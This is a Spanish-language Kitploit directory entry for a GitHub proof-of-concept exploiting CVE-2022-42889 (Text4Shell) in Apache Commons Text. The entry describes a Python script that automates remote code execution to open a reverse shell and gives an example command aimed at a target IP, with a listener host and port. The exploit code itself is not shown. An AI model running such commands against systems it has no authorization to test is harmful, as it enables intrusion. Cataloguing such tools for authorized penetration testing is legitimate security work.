Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-42889-text4shell — Prueba de Concepto (PoC) para CVE-2022-42889 (Text4Shell) dirigida a versiones de Apache Commons Text anteriores a la 1.10.0. Este script automatiza la Ejecución Remota de Código (RCE) mediante interpolación de scripts para establecer una shell inversa. Esta versión es una optimización estructurada basada en el exploit original encontrado en Exploit-DB (ID: 52261). | Kitploit
Herramientas/GitHubGitHub/goultarde/cve-2022-42889-text4shell
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubgoultarde/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

Ver Repositorio
11hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Prueba de Concepto (PoC) para CVE-2022-42889 (Text4Shell) dirigida a versiones de Apache Commons Text anteriores a la 1.10.0. Este script automatiza la Ejecución Remota de Código (RCE) mediante interpolación de scripts para establecer una shell inversa. Esta versión es una optimización estructurada basada en el exploit original encontrado en Exploit-DB (ID: 52261).

Compartir

CVE-2022-42889-text4shell

Descripción

Este script es una herramienta de pruebas de penetración diseñada para explotar la vulnerabilidad CVE-2022-42889, también conocida como Text4Shell, en Apache Commons Text (versiones < 1.10.0). Automatiza el envío de un payload basado en Java para desencadenar una reverse shell.

Esta implementación se basa en el exploit público: https://www.exploit-db.com/exploits/52261

Características

  • Argumentos de línea de comandos usando argparse para una mejor usabilidad.
  • Codificación URL precisa para la compatibilidad del payload de Java.
  • Ruta personalizable y parámetros objetivo vulnerables.

Uso

Requisitos previos

El script requiere Python 3 y la librería requests.

root@kitploit:~
pip install requests

Sintaxis

root@kitploit:~
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT

Ejemplo

root@kitploit:~
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139

Aviso legal

Esta herramienta está destinada únicamente a fines educativos y pruebas de penetración autorizadas. El autor no es responsable de ningún uso indebido o daño causado por este script.

Descargar herramienta